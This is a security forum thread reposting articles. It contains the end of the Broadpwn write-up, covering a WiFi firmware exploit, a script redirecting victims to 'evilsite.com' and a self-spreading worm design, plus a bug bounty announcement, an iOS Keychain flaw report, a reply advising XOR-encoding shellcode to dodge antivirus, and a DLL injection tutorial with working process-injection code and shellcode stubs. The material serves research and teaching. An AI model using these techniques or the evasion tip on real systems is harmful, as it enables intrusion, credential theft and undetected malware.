environment. Once we grab the first slot, exploitation is simple: The fake timer object writes to the offset of p_restore_cpsr, overwriting it with the address of an offset within our packet in the first slot. This is where we will store our payload. Despite the difficulty of this approach and the fact that it requires additional gear, it still offers a powerful alternative to the previous exploitation approach, in that the second approach does not require knowledge of addresses within the system. THE NEXT STEP – PRIVILEGE ESCALATION After achieving stable code execution on the Broadcom chip, an attacker’s natural goal would be to escape the chip and escalate their privileges to code execution on the application processor. There are three main approaches to this problem: Find a bug in the Broadcom kernel driver that handles communication with the chip. The driver and chip communicate using a packet-based protocol, so an extensive attack surface on the kernel is exposed to the chip. This approach is difficult, since, unless a way to leak kernel memory is found, an attacker will not have enough knowledge about the kernel’s address space to carry out a successful exploit. Again, attacking the kernel is made more difficult by the fact that any mistake we make will crash the whole system, causing us to lose our foothold in the WiFi chip. Using PCIe to read and write directly to kernel memory. While WiFi chips prior to the BCM4358 (the main WiFi chip used on the Samsung Galaxy S6) used Broadcom’s SDIO interface, more recent chips use PCIe, which inherently enables DMA to the application processor’s memory. The main drawback of this approach is that it will not support older phones. Waiting for the victim to browse to a non-HTTPS site, then, from the WiFi chip, redirecting them to a malicious URL. The main advantage of this approach is that it supports all devices across the board. The drawback is that a separate exploit chain for the browser is required. We believe that achieving kernel code execution from the chip is a sufficiently complicated subject as to justify a separate research; it is therefore out of the scope of the current research. However, work has already been done by Project Zero to show that a kernel write primitive can be achieved via PCIe [d]. In the current research, our approach is to use our foothold on the WiFi chip to redirect the user to an attacker-controlled site. This task is made simple by the fact that a single firmware function, wlc_recv(), is the starting point for processing all packets. The signature of this function is as follows: void wlc_recv(wlc_info *wlc, void *p); The argument p is a pointer to HNDRTE’s implementation of an sk_buff. It holds a pointer to the packet data, as well as the packet’s length and a pointer to the next packet. We will need to hook the wlc_recv function call, dump the contents of each packet that we receive. and look for packets that encapsulate unencrypted HTTP traffic. At this point, we will modify the packet the include a <script> tag, with the code: “top.location.href = http://www.evilsite.com”. THE FIRST WIFI WORM The nature of the bug, which can be triggered without any need for authentication, and the stability of the exploit, which deterministically and reliably reaches code execution, leads us to the return of an old friend: the self-propagating malware, also known as “worm”. Worms died out around the end of the last decade, together with their essential companion, the remote exploit. They have died out for the same reason: software mitigations have become too mature, and automatic infection over the network became a distant memory. Until now. Broadpwn is ideal for propagation over WLAN: It does not require authentication, doesn’t need an infoleak from the target device, and doesn’t require complicated logic to carry out. Using the information provided above, an attacker can turn a compromised device into a mobile infection station. We implemented our WiFi worm with the following steps: In the previous section, we have started running our own payload after restoring the system to a stable state and preventing a chip crash. The payload will hook wlc_recv, in a similar manner to the one showed above. The code in wlc_recv_hook will inspect each received packet, and determine whether it is a Probe Request. Recall that wlc_recv essentially behaves as if it runs in monitor mode: all packets received over the air are handled by it, and only tossed out later if they are not meant for the STA. If the received packet is a Probe Request with the SSID of a specific AP, wlc_recv_hook will extract the SSID of the requested AP, and start impersonating as that AP by sending out a Probe Response to the STA. In the next stage, wlc_recv should receive an Authentication Open Sequence packet, and our hook function should send a response. This will be followed by an Association Request from the STA. The next packet we will send is the Association Response containing the WMM IE which triggers for the bug. Here, we’ll make use of the fact that we can crash the targeted chip several times without alerting the user, and start sending crafted packets adapted to exploit a specific firmware build. This will be repeated until we have brute forced the correct set of addresses. Alternatively, the second approach, which relies on spraying the ring buffer and placing the fake timer object and the payload at a deterministic location, can also be used. Running an Alfa wireless adapter on monitor mode for about an hour in a crowded urban area, we’ve sniffed hundreds of SSID names in Probe Request packets. Of these, approximately 70% were using a Broadcom WiFi chip [e]. Even assuming moderate infection rates, the impact of a Broadpwn worm running for several days is potentially huge. Old school hackers often miss the “good old days” of the early 2000s, when remotely exploitable bugs were abundant, no mitigations were in place to stop them, and worms and malware ran rampant. But with new research opening previously unknown attack surface such as the BCM WiFi chip, those times may just be making a comeback. References [a] While KASLR is still largely unsupported on Android devices, the large variety of kernels out there effectively means that an attacker can make very few assumptions about an Android kernel’s address space. Another problem is that any misstep during an exploit will cause a kernel panic, crashing the device and drawing the attention of the victim. The BCM43xx family has been the subject of extensive security research in the past. Notable research includes Wardriving from Your Pocket (https://recon.cx/2013/slides/Recon2013-Omri%20Ildis%2C%20Yuval%20Ofir%20and%20Ruby%20Feinstein-Wardriving%20from%20your%20pocket.pdf) by Omri Ildis, Yuval Ofir and Ruby Feinstein; One Firmware to Monitor ’em All (http://archive.hack.lu/2012/Hacklu-2012-one-firmware-Andres-Blanco-Matias-Eissler.pdf) by Andres Blanco and Matias Eissler; and the Nexmon project by SEEMOO Lab (https://github.com/seemoo-lab/nexmon). These projects aimed mostly to implement monitor mode on Nexus phones by modifying the BCM firmware, and their insights greatly assisted the author with the current research. More recently, Gal Beniamini of Project Zero has published the first security-focused report about the BCM43xx family (https://googleprojectzero.blogspot.ca/2017/04/over-air-exploiting-broadcoms-wi-fi_4.html), and has discovered several bugs in the BCM firmware. This function does not exist in the source code that we managed to obtain, so the naming is arbitrary. [d] Gal Beniamini’s second blog post about BCM deals extensively with this issue (https://googleprojectzero.blogspot.co.il/2017/04/over-air-exploiting-broadcoms-wi-fi_11.html). And while a kernel read primitive is not demonstrated in that post, the nature of the MSGBUF protocol seems to make it possible. [e] This is an estimate, and was determined by looking up the OUI part of the sniffed device’s MAC address. Sursa: https://blog.exodusintel.com/2017/07/26/broadpwn/
-
- 1
-
-
Announcing the Windows Bounty Program MSRC Team July 26, 2017 Windows 10 represents the best and newest in our strong commitment to security with world-class mitigations. One of Microsoft’s longstanding strategies toward improving software security involves investing in defensive technologies that make it difficult and costly for attackers to find, exploit and leverage vulnerabilities. We built in mitigations and defenses such as DEP, ASLR, CFG, CIG, ACG, Device Guard, and Credential Guard to harden our systems and we continue adding defenses such as Windows Defender Application Guard to significantly increase protection to harden entry points while ensuring the customer experience is seamless. In the spirit of maintaining a high security bar in Windows, we’re launching the Windows Bounty Program on July 26, 2017. This will include all features of the Windows Insider Preview in addition to focus areas in Hyper-V, Mitigation bypass, Windows Defender Application Guard, and Microsoft Edge. We’re also bumping up the pay-out range for the Hyper-V Bounty Program. Since 2012, we have launched multiple bounties for various Windows features. Security is always changing and we prioritize different types of vulnerabilities at different points in time. Microsoft strongly believes in the value of the bug bounties, and we trust that it serves to enhance our security capabilities. The overall program highlights: Any critical or important class remote code execution, elevation of privilege, or design flaws that compromises a customer’s privacy and security will receive a bounty The bounty program is sustained and will continue indefinitely at Microsoft’s discretion Bounty payouts will range from $500 USD to $250,000 USD If a researcher reports a qualifying vulnerability already found internally by Microsoft, a payment will be made to the first finder at a maximum of 10% of the highest amount they could’ve received (example: $1,500 for a RCE in Edge, $25,000 for RCE in Hyper-V) All security bugs are important to us and we request you report all security bugs to secure@microsoft.com via Coordinated Vulnerability Disclosure (CVD) policy For the latest information on new Windows features included in the Insider Previews, please visit the Windows 10 Insider Program Blog The details of the targets and the focus area can be found in the table below: Category Targets Windows Version Payout range (USD) Focus area Microsoft Hyper-V Windows 10 Windows Server 2012 Windows Server 2012 R2 Windows Server Insider Preview $5,000 to $250,000 Focus area Mitigation bypass and Bounty for defense Windows 10 $500 to $200,000 Focus area Windows Defender Application Guard WIP slow $500 to $30,000 Focus area Microsoft Edge WIP slow $500 to $15,000 Base Windows Insider Preview WIP slow $500 to $15,000 As always, the most up-to-date information about the Microsoft Bounty Programs can be found at https://aka.ms/BugBounty and in the associated terms and FAQs. Akila Srinivasan, Joe Bialek, and Matt Miller from Microsoft Security Response Center David Weston, Jason Silves from Windows and Devices Group Enterprise and Security Arthur Wongtschowski, Mary Lee, Ron Aquino, and Riley Pittman from Windows and Devices Group Information Security Sursa: https://blogs.technet.microsoft.com/msrc/2017/07/26/announcing-the-windows-bounty-program/
-
DLL Execution via Excel.Application RegisterXLL() method
Nytro replied to Nytro's topic in Exploituri
Da, de preferat macar un XOR pe shellcode, sa nu fie detectabil pe semnaturi statice. -
iOS Vulnerability Exposes iPhone Users’ Passwords and Credit Cards The security bug was discovered in the iCloud Keychain Jul 25, 2017 09:34 GMT · By Bogdan Popa · Apple has silently patched a security vulnerability in iOS 10.3 that would have allowed hackers to access information in the iCloud Keychain, including users’ passwords and credit cards. Security firm Longterm Security provides an in-depth look at the security bug, explaining that the vulnerability was discovered in the iCloud Keychain Sync's custom Off-The-Record (OTR) system. iCloud Keychan is a feature that allows Apple users to have their private information synced across multiple devices, including but not limited to passwords and credit cards. Longterm Security co-founder Alex Radocea explained that Apple’s system uses key verifications to transfer data from one device to another securely, but using a man-in-the-middle attack, hackers could have been able to bypass the process and intercept traffic sent by configured devices. Data available to hackers in plain text This means that data stored in the iCloud Keychain would have become available in plain text, without users even being aware of it, as no devices were being added and no notifications were sent. This means that passwords or credit cards were totally exposed to hackers should they wanted to steal them. While the flaw itself has already been patched by Apple in the latest iOS update, the security researcher warns that passwords need proper security, especially because this has become “critical in the real world.” “There are opportunistic attackers and criminals looking to leverage and monetize leaked password dumps in any way they can think up. They represent an immediate and constant threat to iCloud as well as any other cloud service. Passwords alone would be fairly risky when storing a trove of user data including credit card numbers,” he posted. Apple users are strongly recommended to update their devices as soon as possible, with iOS 10.3 currently available via Settings > General > Software Update on iPhones and iPads. It’s believed all the other iOS versions are vulnerable to attacks and are exposing users’ data, so updating is critical to keep data secure. Sursa: http://news.softpedia.com/news/ios-vulnerability-exposes-iphone-users-passwords-and-credit-cards-517156.shtml
-
- 2
-
-
Inject All the Things JUL 16TH, 2017 7:49 PM Well, its 2017 and I’m writing about DLL injection. It could be worse. DLL injection is a technique used by legitimate software to add/extend functionality to other programs, debugging, or reverse engineering. It is also commonly used by malware in a multitude of ways. This means that from a security perspective, it’s imperative to know how DLL injection works. I wrote most of the code of this small project, called ‘injectAllTheThings’, a while ago when I started developing custom tools for Red Team engagements (in order to emulate different types of threat actors). If you want to see some examples of threat actors using DLL injection have a look here. You may also find this project useful if you want to learn about DLL injection. The internet is full of crap when you look for this kind of information/code, and my code might not be better. I’m not a programmer, I just hack code when I need to. Anyway, I’ve put together in a single Visual Studio project multiple DLL injection techniques (actually 7 different techniques) that work both for 32 and 64 bits, in a very easy way to read and understand. Some friends showed interested in the code, so it might interest you too. Every technique has its own source file to keep things simple. Below is the output of the tool, showing all the options and techniques implemented. According to @SubTee, DLL injection is lame. I tend to agree, however DLL injection goes way beyond simply loading a DLL. You can load DLLs with signed Microsoft binaries indeed, but you won’t attach to a certain process to mess with its memory. The reason why most of the Penetration Testers don’t actually know what DLL injection is, or how it works, is because Metasploit has spoiled them too much. They use it all the time, blindly. The best place to learn about this ‘weird’ memory manipulation stuff is actually game hacking forums, I believe. If you are into Red Teaming you might have to get ‘dirty’ and play with this stuff too. Unless you are happy to just run some random tools other people have written. Most of times we start a Red Team exercise using highly sophisticated techniques, and if we stay undetected we start lowering the level of sophistication. That’s basically when we start dropping binaries on disk and playing with DLL injection. This post attempts to give an overview of DLL injection in a very simple and high level way, and at the same time serves as “documentation” support for the project hosted at GitHub. Introduction DLL injection is basically the process of inserting/injecting code into a running process. The code we inject is in the form of a dynamic linked library (DLL). Why? DLLs are meant to be loaded as needed at run time (like shared libs in UNIX). In this project I’ll be using DLLs only, however we actually can ‘inject’ code in many other forms (any PE file, shellcode/assembly, etc. as commonly seen in malware). Also, keep in mind that you need to have an appropriate level of privileges to start playing with other processes’s memory. However, I won’t be talking about protected processes and Windows privilege levels (introduced with Vista). That’s a completely different subject. Again, as I said above DLL injection can be used for legitimate purposes. For example, antivirus and endpoint security solutions use these techniques to place their own software code/hooks into “all” running processes on the system. This enables them to monitor each process while it’s running, and better protect us. There are also malicious purposes. A common technique often used was injecting into the ‘lsass’ process to obtain password hashes. We all have done that. Period. Obviously, malware also uses code injection techniques extensively. Either to run shellcode, run PE files, or load DLLs into the memory of another process to hide itself, among others. The Basics We’ll be using the MS Windows API for every technique, since it offers a considerable number of functions that allow us to attach and manipulate other processes. DLLs have been the cornerstone of MS Windows since the first version of the operating system. In fact, all the functions in the MS Windows API are contained DLLs. Some of the most important are ‘Kernel32.dll’ (which contains functions for managing memory, processes, and threads), ‘User32.dll’ (mostly user-interface functions), and ‘GDI32.dll’ (functions for drawing graphics and text display). You might be wondering why such APIs exist, why would Microsoft give us such a nice set of functions to play and mess with other processes memory? The main reason is to extend the features of an application. For example, a company creates an application and wants to allow other companies to extend or enhance the application. So yes, it has a legitimate usage purpose. Besides, DLLs are useful for project management, conserve memory, resource sharing, and so on. The diagram below tries to illustrate the process flow of almost every DLL injection technique. As you can see above, I would say DLL injection happens in four steps: 1 2 3 4 Attach to the target/remote process Allocate memory within the target/remote process Copy the DLL Path, or the DLL, into the target/remote process memory Instruct the process to execute the DLL All these steps are accomplished by calling a certain set of API functions. Each technique will require a certain setup and options to be set. I would say that each technique has their positives and negatives. Techniques We have multiple options to instruct a process to execute our DLL. The most common ones are maybe ‘CreateRemoteThread()’ and ‘NtCreateThreadEx()’. However, it’s not possible to just pass a DLL as parameter to these functions. We have to provide a memory address that holds the execution starting point. For that, we need to perform memory allocation, load our DLL with ‘LoadLibrary()’, copy memory, and so on. The project I called ‘injectAllTheThings’ (because I just hate the name ‘injector’, plus there are already too many crappy ‘injectors’ on GitHub, and I couldn’t think of anything else), includes 7 different techniques. I’m not the original author of any of the techniques. I just compiled, and cleaned, these seven techniques (yes, there are more). Some are well documented (like ‘CreateRemoteThread()’), others use undocumented APIs (like ‘NtCreateThreadEx()’). Here’s a complete list of the techniques implemented, all working for both 32 and 64 bits. CreateRemoteThread() NtCreateThreadEx() QueueUserAPC SetWindowsHookEx() RtlCreateUserThread() Code cave via SetThreadContext() Reflective DLL You might know some of these techniques by other names. This isn’t a complete list of every DLL injection technique around. As I said, there are more, I might add them later if I have to play with them for a certain project. Until now this the list of techniques I used in some projects. Some are stable, some aren’t. Maybe the unstable ones are because of my own code, you have been warned. LoadLibrary() As stated on MSDN, the ‘LoadLibrary()’ function “loads the specified module into the address space of the calling process. The specified module may cause other modules to be loaded”. 1 2 3 HMODULE WINAPI LoadLibrary( _In_ LPCTSTR lpFileName ); 1 2 3 4 5 6 7 8 9 10 11 lpFileName [in] The name of the module. This can be either a library module (a .dll file) or an executable module (an .exe file). (...) If the string specifies a full path, the function searches only that path for the module. If the string specifies a relative path or a module name without a path, the function uses a standard search strategy to find the module (...) If the function cannot find the module, the function fails. When specifying a path, be sure to use backslashes (\), not forward slashes (/). (...) If the string specifies a module name without a path and the file name extension is omitted, the function appends the default library extension .dll to the module name. (...) In other words, it takes a filename as its only parameter and everything works. That is, we only need to allocate some memory for the path of our DLL and set our execution starting point to the address of ‘LoadLibrary()’ function, passing the memory address of the path as a parameter. As you may, or may not know, the big issue here is that ‘LoadLibrary()’ registers the loaded DLL with the program. Meaning it can be easily detected, but you might be surprised that many endpoint security solutions still fail at this. Anyway, as I said before, DLL injection has legitimate usage cases too, so… Also, note that if a DLL has already been loaded with ‘LoadLibrary()’, it will not be executed again. You might work around this, but I didn’t do it for any of the techniques. With the Reflective DLL injection you don’t have this problem of course, because the DLL is not registered. The Reflective DLL injection technique instead of using ‘LoadLibrary()’, loads the entire DLL into memory. Then determines the offset to the DLL’s entry point to load it. Call it more stealthy if you want. Forensics guys will still be able to find your DLL in memory, but it won’t be that easy. Metasploit uses this massively, still most of endpoint solutions are happy with all this anyway. If you feel like hunting for this kind of stuff, or you are in the ‘blue’ side of the game, have a look here and here. As a side note, if you are really struggling with your endpoint security software being fine with all this… you might want to try to use some gaming anti-cheating engine instead (note, I’m only trying to be funny in case you didn’t get it). The anti-rootkit capabilities of some anti-cheating games is way more advanced than some AVs. There’s a really cool interview with Nick Cano, author of the “Game Hacking” book, on reddit that you must read. Just check what he has been doing and you’ll understand what I’m talking about. Attach to the target/remote process For a start, we need a handle to the process we want to interact with. For this we use the ‘OpenProcess()’ API call. 1 2 3 4 5 HANDLE WINAPI OpenProcess( _In_ DWORD dwDesiredAccess, _In_ BOOL bInheritHandle, _In_ DWORD dwProcessId ); If you read the documentation on MSDN you’ll see that we need to request a certain set of access rights. A complete list of access rights can be found here. These might vary across MS Windows versions. The following is used across almost every technique. 1 2 3 4 5 6 HANDLE hProcess = OpenProcess( PROCESS_QUERY_INFORMATION | PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, dwProcessId); Allocate memory within the target/remote process In order to allocate memory for the DLL path we use ‘VirtualAllocEx()’. As stated in MSDN, ‘VirtualAllocEx()’ “reserves, commits, or changes the state of a region of memory within the virtual address space of a specified process. The function initializes the memory it allocates to zero.” 1 2 3 4 5 6 7 LPVOID WINAPI VirtualAllocEx( _In_ HANDLE hProcess, _In_opt_ LPVOID lpAddress, _In_ SIZE_T dwSize, _In_ DWORD flAllocationType, _In_ DWORD flProtect ); Basically, we’ll do something like this: 1 2 3 4 5 // calculate the number of bytes needed for the DLL's pathname DWORD dwSize = (lstrlenW(pszLibFile) + 1) * sizeof(wchar_t); // allocate space in the target/remote process for the pathname LPVOID pszLibFileRemote = (PWSTR)VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT, PAGE_READWRITE); Or you could be a bit smarter and use the ‘GetFullPathName()’ API call. However, I don’t use this API call on the whole project. Just a matter of preference, or not being smart. If you want to allocate space for the full DLL, you’ll have to do something like: 1 2 3 4 5 hFile = CreateFileW(pszLibFile, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); dwSize, = GetFileSize(hFile, NULL); PVOID pszLibFileRemote = (PWSTR)VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT, PAGE_READWRITE); Copy the DLL Path, or the DLL, into the target/remote process' memory Now it’s just a matter of copying our DLL Path, or the full DLL, into the target/remote process by using the ‘WriteProcessMemory()’ API call. 1 2 3 4 5 6 7 BOOL WINAPI WriteProcessMemory( _In_ HANDLE hProcess, _In_ LPVOID lpBaseAddress, _In_ LPCVOID lpBuffer, _In_ SIZE_T nSize, _Out_ SIZE_T *lpNumberOfBytesWritten ); That is something like… 1 DWORD n = WriteProcessMemory(hProcess, pszLibFileRemote, (PVOID)pszLibFile, dwSize, NULL); If we want to copy the full DLL, like in the Reflective DLL injection technique, there’s a bit more code, as we need to read it into memory before we copy it into the target/remote process. 1 2 3 4 5 lpBuffer = HeapAlloc(GetProcessHeap(), 0, dwLength); ReadFile(hFile, lpBuffer, dwLength, &dwBytesRead, NULL); WriteProcessMemory(hProcess, pszLibFileRemote, (PVOID)pszLibFile, dwSize, NULL); As I mentioned before, by using the Reflective DLL injection technique, and copying the DLL into memory, the DLL won’t be registered with the process. It gets a bit complex because we need to obtain the entry point to the DLL when it is loaded in memory. The ‘LoadRemoteLibraryR()’ function, which is part of the Reflective DLL project, does it for us. Have a look at the source if you want. One thing to notice is that the DLL we’ll be injecting needs to be compiled with the appropriate includes and options so it aligns itself with the ReflectiveDLLInjection method. The ‘injectAllTheThings’ project includes a DLL called ‘rdll_32.dll/rdll_64.dll’ that you can use to play with. Instruct the process to execute the DLL CreateRemoteThread() We can say that ‘CreateRemoteThread()’ is the classic and most popular DLL Injection technique around. Also, the most well documented one. It consists of the steps below: 1 2 3 4 5 Open the target process with OpenProcess() Find the address of LoadLibrary() by using GetProcAddress() Reserve memory for the DLL path in the target/remote process address space by using VirtualAllocEx() Write the DLL path into the previously reserved memory space with WriteProcessMemory() Use CreateRemoteThread() to create a new thread, which will call the LoadLibrary() function with the DLL path name as parameter If you look at ‘CreateRemoteThread()’ documentation on MSDN, we can see that we need a “pointer to the application-defined function of type LPTHREAD_START_ROUTINE to be executed by the thread and represents the starting address of the thread in the remote process.” Which means that to execute our DLL we only need to instruct our process to do it. Simple. See below all the basic steps listed above. 1 2 3 4 5 6 7 8 9 10 11 12 13 HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, dwProcessId); // Allocate space in the remote process for the pathname LPVOID pszLibFileRemote = (PWSTR)VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT, PAGE_READWRITE); // Copy the DLL's pathname to the remote process address space DWORD n = WriteProcessMemory(hProcess, pszLibFileRemote, (PVOID)pszLibFile, dwSize, NULL); // Get the real address of LoadLibraryW in Kernel32.dll PTHREAD_START_ROUTINE pfnThreadRtn = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW"); // Create a remote thread that calls LoadLibraryW(DLLPathname) HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, pfnThreadRtn, pszLibFileRemote, 0, NULL); For the complete source code see ’t_CreateRemoteThread.cpp'. NtCreateThreadEx() Another option is to use ‘NtCreateThreadEx()’. This is an undocumented ‘ntdll.dll’ function and it might disappear or change in the future. This technique is a bit more complex to implement as we need a structure (see below) to pass to it and another to receive data from it. 1 2 3 4 5 6 7 8 9 10 11 struct NtCreateThreadExBuffer { ULONG Size; ULONG Unknown1; ULONG Unknown2; PULONG Unknown3; ULONG Unknown4; ULONG Unknown5; ULONG Unknown6; PULONG Unknown7; ULONG Unknown8; }; There’s a good explanation about this call here. The setup is very close to what we do for ‘CreateRemoteThread()’. However, instead of calling ‘CreateRemoteThread()’ we do something along the lines. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 PTHREAD_START_ROUTINE ntCreateThreadExAddr = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("ntdll.dll")), "NtCreateThreadEx"); LPFUN_NtCreateThreadEx funNtCreateThreadEx = (LPFUN_NtCreateThreadEx)ntCreateThreadExAddr; NTSTATUS status = funNtCreateThreadEx( &hRemoteThread, 0x1FFFFF, NULL, hProcess, pfnThreadRtn, (LPVOID)pszLibFileRemote, FALSE, NULL, NULL, NULL, NULL ); For the complete source code see ’t_NtCreateThreadEx.cpp'. QueueUserAPC() An alternative to the previous techniques, that doesn’t create a new thread in the target/remote process, is the ‘QueueUserAPC()’ call. As documented on MSDN, this call “adds a user-mode asynchronous procedure call (APC) object to the APC queue of the specified thread.” Here’s the definition. 1 2 3 4 5 DWORD WINAPI QueueUserAPC( _In_ PAPCFUNC pfnAPC, _In_ HANDLE hThread, _In_ ULONG_PTR dwData ); 1 2 3 4 5 6 7 8 9 pfnAPC [in] A pointer to the application-supplied APC function to be called when the specified thread performs an alertable wait operation. (...) hThread [in] A handle to the thread. The handle must have the THREAD_SET_CONTEXT access right. (...) dwData [in] A single value that is passed to the APC function pointed to by the pfnAPC parameter. So, if we don’t want to create our own thread, we can use ‘QueueUserAPC()’ to “hijack” an existing thread in the target/remote process. That is, calling this function will queue an asynchronous procedure call on the specified thread. We can use a real APC callback function instead of ‘LoadLibrary()’. The parameter can actually be a pointer to the filename of the DLL we want to inject. 1 DWORD dwResult = QueueUserAPC((PAPCFUNC)pfnThreadRtn, hThread, (ULONG_PTR)pszLibFileRemote); There’s a little gotcha that you might notice if you try this technique, which is related to the way MS Windows executes APC’s. There’s no scheduler looking at the APC queue, meaning the queue is only examined when the thread becomes alertable. Because of this we basically hijack every single thread, see below. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 BOOL bResult = Thread32First(hSnapshot, &threadEntry); while (bResult) { bResult = Thread32Next(hSnapshot, &threadEntry); if (bResult) { if (threadEntry.th32OwnerProcessID == dwProcessId) { threadId = threadEntry.th32ThreadID; wprintf(TEXT("[+] Using thread: %i\n"), threadId); HANDLE hThread = OpenThread(THREAD_SET_CONTEXT, FALSE, threadId); if (hThread == NULL) wprintf(TEXT("[-] Error: Can't open thread. Continuing to try other threads...\n")); else { DWORD dwResult = QueueUserAPC((PAPCFUNC)pfnThreadRtn, hThread, (ULONG_PTR)pszLibFileRemote); if (!dwResult) wprintf(TEXT("[-] Error: Couldn't call QueueUserAPC on thread> Continuing to try othrt threads...\n")); else wprintf(TEXT("[+] Success: DLL injected via CreateRemoteThread().\n")); CloseHandle(hThread); } } } } We basically do this expecting one thread to become alertable. As a side note, it was nice to see this technique being used by DOUBLEPULSAR. For the complete source code see ’t_QueueUserAPC.cpp'. SetWindowsHookEx() In order to use this technique the first thing we need to understand is how MS Windows hooks work. Basically, hooks are a way to intercept events and act on them. As you may guess, there are many different types of hooks. The most common ones might be WH_KEYBOARD and WH_MOUSE. You guessed right, these can be used to monitor, the keyboard and mouse input. The ‘SetWindowsHookEx()’ “installs an application-defined hook procedure into a hook chain.” 1 2 3 4 5 6 HHOOK WINAPI SetWindowsHookEx( _In_ int idHook, _In_ HOOKPROC lpfn, _In_ HINSTANCE hMod, _In_ DWORD dwThreadId ); 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 idHook [in] Type: int The type of hook procedure to be installed. (...) lpfn [in] Type: HOOKPROC A pointer to the hook procedure. (...) hMod [in] Type: HINSTANCE A handle to the DLL containing the hook procedure pointed to by the lpfn parameter. (...) dwThreadId [in] Type: DWORD The identifier of the thread with which the hook procedure is to be associated. (...) An interesting remark on MSDN states that: “SetWindowsHookEx can be used to inject a DLL into another process. A 32-bit DLL cannot be injected into a 64-bit process, and a 64-bit DLL cannot be injected into a 32-bit process. If an application requires the use of hooks in other processes, it is required that a 32-bit application call SetWindowsHookEx to inject a 32-bit DLL into 32-bit processes, and a 64-bit application call SetWindowsHookEx to inject a 64-bit DLL into 64-bit processes. The 32-bit and 64-bit DLLs must have different names.” Keep this in mind. Here’s a simple extract of the implementation. 1 2 3 GetWindowThreadProcessId(targetWnd, &dwProcessId); HHOOK handle = SetWindowsHookEx(WH_KEYBOARD, addr, dll, threadID); We need to understand that every event that occurs will go through a hook chain, which is a series of procedures that will run on the event. The setup of ‘SetWindowsHookExe()’ is basically how we put our own hook procedure into the hook chain. The code above takes the type of hook to be installed (WH_KEYBOARD), the pointer to the procedure, the handle to the DLL with the procedure, and the thread id to associate the hook to. In order to get the pointer to the procedure we need to first load the DLL using the ‘LoadLibrary()’ call. Then we call ‘SetWindowsHookEx()’ and wait for the event that we want (in our case pressing a key). Once that event happens our DLL is executed. Note that even the CIA guys are, potentially, having some fun with ‘SetWindowsHookEx()’ as we can see on Wikileaks. For the complete source code see ’t_SetWindowsHookEx.cpp'. RtlCreateUserThread() The ‘RtlCreateUserThread()’ is an undocumented API call. Its setup is, almost, the same as ‘CreateRemoteThread()’, and subsequently as ‘NtCreateThreadEx()’. Actually, ‘RtlCreateUserThread()’ calls ‘NtCreateThreadEx()’, which means ‘RtlCreateUserThread()’ is a small wrapper for ‘NtCreateThreadEx()’. So, nothing new here. However, we might want to just use ‘RtlCreateUserThread()’ instead of ‘NtCreateThreadEx()’. Even if the later changes, our ‘RtlCreateUserThread()’ should still work. As you might know, among others, mimikatz and Metasploit both use ‘RtlCreateUserThread()’. If you are curious, have a look here and here. So, if mimikatz and Metasploit are using ‘RtlCreateUserThread()’… and yes, those guys know their stuff… follow their “advice”, use ‘RtlCreateUserThread()’. Especially if you are planning to do something more serious than a simple ‘injectAllTheThings’ program. For the complete source code see ’t_RtlCreateUserThread.cpp'. SetThreadContext() This is actually a very cool method. A specially crafted code is injected into the target/remote process by allocating a chunk of memory in the target/remote process. This code is responsible for loading the DLL. Here’s the code for 32 bits. 1 2 3 4 5 6 7 8 9 0x68, 0xCC, 0xCC, 0xCC, 0xCC, // push 0xDEADBEEF (placeholder for return address) 0x9c, // pushfd (save flags and registers) 0x60, // pushad 0x68, 0xCC, 0xCC, 0xCC, 0xCC, // push 0xDEADBEEF (placeholder for DLL path name) 0xb8, 0xCC, 0xCC, 0xCC, 0xCC, // mov eax, 0xDEADBEEF (placeholder for LoadLibrary) 0xff, 0xd0, // call eax (call LoadLibrary) 0x61, // popad (restore flags and registers) 0x9d, // popfd 0xc3 // ret For 64 bits I couldn’t actually find any assembly working code and I kinda wrote my own. See below. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 0x50, // push rax (save rax) 0x48, 0xB8, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, // mov rax, 0CCCCCCCCCCCCCCCCh (placeholder for return address) 0x9c, // pushfq 0x51, // push rcx 0x52, // push rdx 0x53, // push rbx 0x55, // push rbp 0x56, // push rsi 0x57, // push rdi 0x41, 0x50, // push r8 0x41, 0x51, // push r9 0x41, 0x52, // push r10 0x41, 0x53, // push r11 0x41, 0x54, // push r12 0x41, 0x55, // push r13 0x41, 0x56, // push r14 0x41, 0x57, // push r15 0x68,0xef,0xbe,0xad,0xde, // fastcall convention 0x48, 0xB9, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, // mov rcx, 0CCCCCCCCCCCCCCCCh (placeholder for DLL path name) 0x48, 0xB8, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, // mov rax, 0CCCCCCCCCCCCCCCCh (placeholder for LoadLibrary) 0xFF, 0xD0, // call rax (call LoadLibrary) 0x58, // pop dummy 0x41, 0x5F, // pop r15 0x41, 0x5E, // pop r14 0x41, 0x5D, // pop r13 0x41, 0x5C, // pop r12 0x41, 0x5B, // pop r11 0x41, 0x5A, // pop r10 0x41, 0x59, // pop r9 0x41, 0x58, // pop r8 0x5F, // pop rdi 0x5E, // pop rsi 0x5D, // pop rbp 0x5B, // pop rbx 0x5A, // pop rdx 0x59, // pop rcx 0x9D, // popfq 0x58, // pop rax 0xC3 // ret Before we inject this code into the target process some placeholders need to be filled/patched with: Return address (address where the thread should resume once the code stub has finished execution) The DLL path name Address of LoadLibrary() And that’s when the game of hijacking, suspending, injecting, and resuming a thread comes into play. We need first to attach to the target/remote process, of course, and allocate memory into the target/remote process. Note that we need to allocate memory with 